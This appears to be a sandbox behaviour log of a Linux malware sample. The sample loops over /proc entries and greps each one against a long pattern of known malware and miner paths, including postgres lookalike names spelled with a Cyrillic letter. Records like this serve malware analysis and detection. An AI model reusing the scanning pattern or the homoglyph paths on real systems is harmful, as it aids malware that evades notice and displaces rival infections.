/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:835
-
-
/bin/grepgrep exe2⤵PID:838
-
-
/bin/lsls -latrh /proc/212⤵PID:837
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:840
-
-
/bin/grepgrep exe2⤵PID:843
-
-
/bin/lsls -latrh /proc/222⤵PID:842
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:845
-
-
/bin/grepgrep exe2⤵PID:848
-
-
/bin/lsls -latrh /proc/232⤵PID:847
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:850
-
-
/bin/grepgrep exe2⤵PID:853
-
-
/bin/lsls -latrh /proc/2352⤵PID:852
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:855
-
-
/bin/grepgrep exe2⤵PID:858
-
-
/bin/lsls -latrh /proc/242⤵PID:857
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:860
-
-
/bin/grepgrep exe2⤵PID:863
-
-
/bin/lsls -latrh /proc/32⤵PID:862
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:865
-
-
/bin/grepgrep exe2⤵PID:868
-
-
/bin/lsls -latrh /proc/3202⤵PID:867
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:870
-
-
/bin/grepgrep exe2⤵PID:873
-
-
/bin/lsls -latrh /proc/3232⤵PID:872
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:875
-
-
/bin/grepgrep exe2⤵PID:878
-
-
/bin/lsls -latrh /proc/3262⤵PID:877
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:880
-
-
/bin/grepgrep exe2⤵PID:883
-
-
/bin/lsls -latrh /proc/3542⤵PID:882
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:885
-
-
/bin/grepgrep exe2⤵PID:888
-
-
/bin/lsls -latrh /proc/3562⤵PID:887
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:890
-
-
/bin/grepgrep exe2⤵PID:893
-
-
/bin/lsls -latrh /proc/362⤵PID:892
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:895
-
-
/bin/grepgrep exe2⤵PID:898
-
-
/bin/lsls -latrh /proc/372⤵PID:897
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:900
-
-
/bin/grepgrep exe2⤵PID:903
-
-
/bin/lsls -latrh /proc/3782⤵PID:902
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:905
-
-
/bin/grepgrep exe2⤵PID:908
-
-
/bin/lsls -latrh /proc/3802⤵PID:907
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:910
-
-
/bin/grepgrep exe2⤵PID:913
-
-
/bin/lsls -latrh /proc/3852⤵PID:912
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:915
-
-
/bin/grepgrep exe2⤵PID:918
-
-
/bin/lsls -latrh /proc/42⤵PID:917
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:920
-
-
/bin/grepgrep exe2⤵PID:923
-
-
/bin/lsls -latrh /proc/4142⤵PID:922
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:925
-
-
/bin/grepgrep exe2⤵PID:928
-
-
/bin/lsls -latrh /proc/52⤵PID:927
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:930
-
-
/bin/grepgrep exe2⤵PID:933
-
-
/bin/lsls -latrh /proc/62⤵PID:932
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:935
-
-
/bin/grepgrep exe2⤵PID:939
-
-
/bin/lsls -latrh /proc/6682⤵PID:938
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:942
-
-
/bin/lsls -latrh /proc/6722⤵PID:944
-
-
/bin/grepgrep exe2⤵PID:945
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:948
-
-
/bin/grepgrep exe2⤵PID:951
-
-
/bin/lsls -latrh /proc/6762⤵PID:950
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:954
-
-
/bin/grepgrep exe2⤵PID:958
-
-
/bin/lsls -latrh /proc/6772⤵PID:957
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:961
-
-
/bin/grepgrep exe2⤵PID:964
-
-
/bin/lsls -latrh /proc/6852⤵PID:963
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:968
-
-
/bin/grepgrep exe2⤵PID:971
-
-
/bin/lsls -latrh /proc/692⤵PID:970
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:974
-
-
/bin/grepgrep exe2⤵PID:978
-
-
/bin/lsls -latrh /proc/6982⤵PID:977
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:980
-
-
/bin/grepgrep exe2⤵PID:984
-
-
/bin/lsls -latrh /proc/6992⤵PID:983
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:987
-
-
/bin/grepgrep exe2⤵PID:991
-
-
/bin/lsls -latrh /proc/72⤵PID:990
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:994
-
-
/bin/grepgrep exe2⤵PID:997
-
-
/bin/lsls -latrh /proc/7032⤵PID:996
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1001
-
-
/bin/grepgrep exe2⤵PID:1004
-
-
/bin/lsls -latrh /proc/7042⤵PID:1003
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1008
-
-
/bin/grepgrep exe2⤵PID:1011
-
-
/bin/lsls -latrh /proc/7052⤵PID:1010
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1015
-
-
/bin/grepgrep exe2⤵PID:1018
-
-
/bin/lsls -latrh /proc/7062⤵
- Reads runtime system information
PID:1017
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1021
-
-
/bin/grepgrep exe2⤵PID:1025
-
-
/bin/lsls -latrh /proc/7092⤵PID:1024
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1027
-
-
/bin/grepgrep exe2⤵PID:1032
-
-
/bin/lsls -latrh /proc/712⤵PID:1031
-
-
